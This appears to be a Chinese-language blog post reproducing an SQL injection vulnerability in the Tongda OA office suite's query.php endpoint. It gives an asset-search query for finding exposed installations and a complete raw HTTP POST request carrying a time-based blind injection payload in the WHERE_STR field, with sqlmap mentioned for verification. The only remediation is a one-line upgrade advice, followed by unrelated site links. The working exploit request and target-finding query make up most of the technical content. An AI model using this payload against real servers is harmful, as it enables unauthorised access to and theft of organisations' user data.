通达OA query.php SQL注入漏洞

产品介绍

通达OA(Office Automation)是一款企业级协同办公软件,旨在为企业提供高效、便捷、安全、可控的办公环境。它涵盖了企业日常办公所需的各项功能,包括人事管理、财务管理、采购管理、销售管理、库存管理、生产管理、办公自动化等。通达OA支持PC端和移动端使用,可以实现随时随地办公,提高工作效率和协作能力。同时,它还具备高度可定制性和扩展性,可以根据企业的实际需求进行定制开发,满足企业的个性化需求。通达OA广泛应用于各类企业,帮助企业实现数字化转型,提高管理效率和竞争力。

漏洞描述

通达OA query.php 接口处存在SQL注入漏洞,攻击者未经授权可以访问数据库中的数据,从而盗取用户数据,造成用户信息泄露。

资产测绘

app=“TDXK-通达OA”

漏洞复现

POST /general/management_center/portal/oa_engine/engine_manage_bulletin_number/query.php HTTP/1.1
Host: 
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Connection: close
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Content-Type: application/x-www-form-urlencoded
Content-Length: 61

WHERE_STR=-@`'` AND (SELECT 9637 FROM (SELECT(SLEEP(5)))a)

在这里插入图片描述

sqlmap验证
在这里插入图片描述

修复建议

  1. 联系厂商,升级至安全版本。

相关推荐

  1. SQL注入漏洞利用

    2024-04-29 13:56:02       32 阅读
  2. SQL注入漏洞详解

    2024-04-29 13:56:02       11 阅读

最近更新

  1. TCP协议是安全的吗?

    2024-04-29 13:56:02       16 阅读
  2. 阿里云服务器执行yum,一直下载docker-ce-stable失败

    2024-04-29 13:56:02       16 阅读
  3. 【Python教程】压缩PDF文件大小

    2024-04-29 13:56:02       15 阅读
  4. 通过文章id递归查询所有评论(xml)

    2024-04-29 13:56:02       18 阅读

热门阅读

  1. css实现dom脱离文档流定位固定位置

    2024-04-29 13:56:02       15 阅读
  2. Elasticsearch索引监控全面解析

    2024-04-29 13:56:02       16 阅读
  3. mysql的触发器,存储过程

    2024-04-29 13:56:02       16 阅读
  4. Elasticsearch索引状态管理实战指南

    2024-04-29 13:56:02       19 阅读
  5. Redis(五) Redis锁

    2024-04-29 13:56:02       16 阅读
  6. Ubuntu 22.04 安装Oracle 11g Express Edition

    2024-04-29 13:56:02       14 阅读
  7. CSS基础:4类组合选择器以及5个注意事项

    2024-04-29 13:56:02       18 阅读
  8. 【面经&八股】搜广推方向:面试记录(十三)

    2024-04-29 13:56:02       14 阅读
  9. 权利压迫攻击(Grinding Attack)是什么

    2024-04-29 13:56:02       13 阅读
  10. qt中lineEdit设置为不可编辑

    2024-04-29 13:56:02       13 阅读
  11. Android 振动和触感反馈功能失效问题分析

    2024-04-29 13:56:02       13 阅读
  12. react怎么制作选项卡

    2024-04-29 13:56:02       14 阅读
  13. React动态菜单权限控制完全指南

    2024-04-29 13:56:02       11 阅读
  14. 【c++】weak_ptr和观察者模式

    2024-04-29 13:56:02       12 阅读
  15. B树、B+树、B*树

    2024-04-29 13:56:02       11 阅读